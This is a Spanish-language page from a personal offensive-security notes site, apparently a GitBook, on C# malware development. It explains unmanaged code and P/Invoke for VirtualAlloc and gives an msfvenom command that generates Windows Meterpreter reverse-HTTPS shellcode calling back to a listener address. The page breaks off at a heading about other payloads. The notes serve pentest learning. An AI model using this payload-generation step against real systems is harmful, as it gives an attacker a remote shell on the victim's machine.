CyberSec Notes
  • Bienvenida
    • CyberSec Notes
  • Network Services
    • Port 21 - FTP
    • Port 22 - SSH
    • Port 23 - Telnet
    • Port 25 - SMTP
    • Port 53 - DNS
      • Deploy DNS Server with BIND
    • Port 80/443 - HTTP/HTTPS
      • Wordpress
      • CMS Made Simple (CMSMS)
    • Port 88 - Kerberos
    • Port 386, 636, 3268, 3269 - LDAP
    • Port 445 - SMB
    • Port 1521,1522-1529 - Oracle TNS Listener
    • Port 3128 - Squid
    • Port 5985, 5986 - WinRM
  • Command && Control
    • Sliver C2 [in progress]
  • Ataques en Entornos Windows
    • MalDev
      • AV Evasion
        • Function call obfuscation
      • Code Samples
        • Shellcode Execution C#
        • Shellcode Execution C++
        • Stager HTTP C#
        • Stager HTTP C++
        • Process Inyection C++
        • Process Inyection C#
        • XOR Encrypt C++
    • Directorio Activo
      • Spriying
      • Autenticacion Net-NTLMv2 y tipos de hashes
        • Pass the Hash
        • SMB Relay
      • Autenticación Kerberos
        • Extensiones del protocolo Kerberos (SPNs & PACs)
        • AS_REP Roasting
        • Kerberoasting
        • Silver Ticket Attack
        • Golden Ticket Attack
      • DCSync
      • Mimikatz
      • BloodHound
      • Privilege Escalation
        • PS Credentials in XML format
      • Utils
    • Amsi Bypass
    • Buffer Overflow
      • Stack Based 32 bits [in progress]
        • Windows SLMail 5.5
  • Ataques en Entornos Linux
    • Privilege escalation [in progress]
    • MalDev
      • Simple Reverse Shell
    • Buffer Over Flow
      • Stack Based 32 bits
        • Linux, Vulnerable functions in C programs
    • Persistencia
  • General
    • Host Discovery
    • Reverse Shells Cheet Sheet
    • Pivoting
      • Chisel
      • Port Forwarding
      • Nmap con pivoting
    • Google Dorks [in progress]
    • Denial of Service (DoS)
      • Low and Slow
    • Docker
  • Pentesting Web
    • XML External Entity Injection(XXE)
      • Portswigger Lab #1: Retrieve Files
      • Portswigger Lab #2: Perform SSRF
      • Portswigger Lab #6: Blind XXE to retrieve data via error messages
    • Open Redirect
    • LFI
      • Log Poisoning (Apache, SSH y SMPT)
  • Wireless Pentesting
    • Pre Connection Attacks
      • WEP
      • WPA/WPA2
    • Post Connection Attacks
      • ARP Spoof
    • Fake AP for Captive Portal
Powered by GitBook
On this page
  • Unmanaged Code
  • Crear el shellcode
  1. Ataques en Entornos Windows

MalDev

Compilado de técnicas en C#

PreviousSliver C2 [in progress]NextAV Evasion

Last updated 1 year ago

Unmanaged Code

C# es un lenguaje de alto nivel y genera un bytecode en el momento de la compilación. Además, también proporciona características para ejecutar código inseguro como pointers, pero que también está en un alto nivel si se compila el código con C # Compiler (csc.exe). Este tipo de código en Windows se llama managed code, donde toda la gestión de memoria es manejada por el CLR(Common Language Runtime).

Además, C# es un lenguaje muy flexible y permite llamar a la función definida en las DLL del código fuente que no está escrito en C#. Este tipo de código se conoce como unmanaged code. A diferencia del managed code, el desarrollador es responsable del manejo de los recursos.

Para utilizar el unmanaged code, deberemos importar librerias que nos permitan esto. Por lo que haremos uso de P/Invoke para este paso. Por ejemplo para la funcion VirtualAlloc que está escrita en C, la podemos importar de la siguiente forma (eligiendo una de las tres):

Crear el shellcode

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.182.128 lport=443 -f csharp -o shellcode.cs 

Otros tipos de payloads en msfvenom: